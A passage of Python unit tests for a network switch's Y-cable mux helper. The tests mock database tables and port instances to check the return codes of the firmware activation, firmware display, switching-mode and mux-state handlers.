xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"activate_firmware": "null"}
rc = handle_config_firmware_acti_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_acti_fw_cmd_arg_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_acti_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"down_firmware": "null"}
rc = handle_config_firmware_acti_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_acti_fw_cmd_arg_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "activate_firmware", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_config_firmware_acti_cmd_arg_tbl_notification_with_instance(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.activate_firmware = MagicMock(return_value=True)
thread_instance = MagicMock()
thread_instance.start = MagicMock()
thread_obj = thread_instance
port_instance_helper = port_instance
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"activate_firmware": "null"}
rc = handle_config_firmware_acti_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_acti_fw_cmd_arg_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_acti_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"activate_firmware": "null"}
rc = handle_config_firmware_acti_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_acti_fw_cmd_arg_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_firmware_show_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_fw_res_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"firmware_version": "null"}
rc = handle_show_firmware_show_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_show_fw_res_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_firmware_show_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_fw_res_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"down_firmware": "null"}
rc = handle_show_firmware_show_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_show_fw_res_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "activate_firmware", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_show_firmware_show_cmd_arg_tbl_notification_with_instance(self, mock_swsscommon_table, platform_sfputil):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_fw_res_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
platform_sfputil.get_asic_id_for_logical_port = 0
fvp = {"firmware_version": "null"}
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
def get_read_side(self):
return 1
# Defining function without self argument creates an exception,
# which is what we want for this test.
def get_mux_direction():
pass
patched_util.get.return_value = PortInstanceHelper()
rc = handle_show_firmware_show_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_show_fw_res_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_firmware_show_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_fw_res_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"firmware_version": "null"}
rc = handle_show_firmware_show_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_show_fw_res_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_mux_switchmode_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_fw_res_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"config": "null"}
rc = handle_config_mux_switchmode_arg_tbl_notification(
fvp, xcvrd_config_hwmode_swmode_cmd_sts_tbl, xcvrd_config_hwmode_swmode_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_mux_switchmode_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"down_firmware": "null"}
rc = handle_config_mux_switchmode_arg_tbl_notification(
fvp, xcvrd_config_hwmode_swmode_cmd_sts_tbl, xcvrd_config_hwmode_swmode_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "activate_firmware", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_config_mux_switchmode_cmd_arg_tbl_notification_with_instance_manual(self, mock_swsscommon_table, platform_sfputil):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
platform_sfputil.get_asic_id_for_logical_port = 0
fvp = {"config": "manual"}
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
self.SWITCHING_MODE_MANUAL = "manual"
def get_read_side(self):
return 1
def set_switching_mode(self, mode):
return True
# Defining function without self argument creates an exception,
# which is what we want for this test.
def get_mux_direction():
pass
patched_util.get.return_value = PortInstanceHelper()
rc = handle_config_mux_switchmode_arg_tbl_notification(
fvp, xcvrd_config_hwmode_swmode_cmd_sts_tbl, xcvrd_config_hwmode_swmode_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_mux_switchmode_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"config": "manual"}
rc = handle_config_mux_switchmode_arg_tbl_notification(
fvp, xcvrd_config_hwmode_swmode_cmd_sts_tbl, xcvrd_config_hwmode_swmode_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "activate_firmware", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_config_mux_switchmode_cmd_arg_tbl_notification_with_instance_auto(self, mock_swsscommon_table, platform_sfputil):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
platform_sfputil.get_asic_id_for_logical_port = 0
fvp = {"config": "auto"}
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
self.SWITCHING_MODE_MANUAL = "manual"
self.SWITCHING_MODE_AUTO = "auto"
def get_read_side(self):
return 1
def set_switching_mode(self, mode):
return True
# Defining function without self argument creates an exception,
# which is what we want for this test.
def get_mux_direction():
pass
patched_util.get.return_value = PortInstanceHelper()
rc = handle_config_mux_switchmode_arg_tbl_notification(
fvp, xcvrd_config_hwmode_swmode_cmd_sts_tbl, xcvrd_config_hwmode_swmode_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_mux_switchmode_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"state": "null"}
rc = handle_show_hwmode_swmode_cmd_arg_tbl_notification(
fvp, xcvrd_show_hwmode_swmode_cmd_sts_tbl, xcvrd_show_hwmode_swmode_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_mux_switchmode_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"down_firmware": "null"}
rc = handle_show_hwmode_swmode_cmd_arg_tbl_notification(
fvp, xcvrd_show_hwmode_swmode_cmd_sts_tbl, xcvrd_show_hwmode_swmode_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "activate_firmware", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_show_mux_switchmode_cmd_arg_tbl_notification_with_instance_manual(self, mock_swsscommon_table, platform_sfputil):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
platform_sfputil.get_asic_id_for_logical_port = 0
fvp = {"state": "manual"}
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = 0
self.SWITCHING_MODE_MANUAL = 0
self.SWITCHING_MODE_AUTO = 1
def get_read_side(self):
return 1
def get_switching_mode(self):
return 0
# Defining function without self argument creates an exception,
# which is what we want for this test.
def get_mux_direction():
pass
patched_util.get.return_value = PortInstanceHelper()
rc = handle_show_hwmode_swmode_cmd_arg_tbl_notification(
fvp, xcvrd_show_hwmode_swmode_cmd_sts_tbl, xcvrd_show_hwmode_swmode_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_mux_switchmode_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"state": "manual"}
rc = handle_show_hwmode_swmode_cmd_arg_tbl_notification(
fvp, xcvrd_show_hwmode_swmode_cmd_sts_tbl, xcvrd_show_hwmode_swmode_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "activate_firmware", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_show_mux_switchmode_cmd_arg_tbl_notification_with_instance_auto(self, mock_swsscommon_table, platform_sfputil):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_hwmode_swmode_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
platform_sfputil.get_asic_id_for_logical_port = 0
fvp = {"state": "auto"}
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
self.SWITCHING_MODE_MANUAL = 0
self.SWITCHING_MODE_AUTO = 1
def get_read_side(self):
return 1
def get_switching_mode(self):
return 1
# Defining function without self argument creates an exception,
# which is what we want for this test.
def get_mux_direction():
pass
patched_util.get.return_value = PortInstanceHelper()
rc = handle_show_hwmode_swmode_cmd_arg_tbl_notification(
fvp, xcvrd_show_hwmode_swmode_cmd_sts_tbl, xcvrd_show_hwmode_swmode_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_mux_state_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"config": "active"}
rc = handle_config_hwmode_state_cmd_arg_tbl_notification(
fvp, xcvrd_config_hwmode_state_cmd_sts_tbl, xcvrd_config_hwmode_state_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_mux_switchmode_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"down_firmware": "null"}
rc = handle_config_hwmode_state_cmd_arg_tbl_notification(
fvp, xcvrd_config_hwmode_state_cmd_sts_tbl, xcvrd_config_hwmode_state_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "activate_firmware", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_config_mux_state_cmd_arg_tbl_notification_with_instance_manual(self, mock_swsscommon_table, platform_sfputil):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
platform_sfputil.get_asic_id_for_logical_port = 0
